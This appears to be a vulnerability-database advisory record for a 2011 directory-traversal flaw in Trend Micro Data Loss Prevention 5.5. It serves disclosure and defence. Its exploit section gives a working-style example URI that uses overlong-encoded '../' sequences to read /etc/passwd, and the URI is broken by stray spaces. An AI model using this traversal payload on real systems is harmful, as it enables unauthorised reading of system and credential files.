ID
VAR-E-201106-0621
TITLE
Trend Micro Data Loss Prevention Directory Traversal Vulnerability
Trust: 0.3
DESCRIPTION
Trend Micro Data Loss Prevention is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.
Trend Micro Data Loss Prevention 5.5 is vulnerable; other versions may also be affected.
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | trend micro | model: | data loss prevention | scope: | eq | version: | 5.5 | Trust: 0.3 |
EXPLOIT
Attackers can use a browser to exploit this issue.
The following example URI is available:
https://www.example.com:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
Luis Martinez, Sergio Lopez,White Hat Consultores
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 48225 | Trust: 0.3 |
REFERENCES
| url: | http://us.trendmicro.com/us/products/enterprise/data-loss-prevention/index.html | Trust: 0.3 |
SOURCES
| db: | BID | id: | 48225 |
LAST UPDATE DATE
2022-07-27T09:35:50.436000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 48225 | date: | 2011-06-11T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 48225 | date: | 2011-06-11T00:00:00 |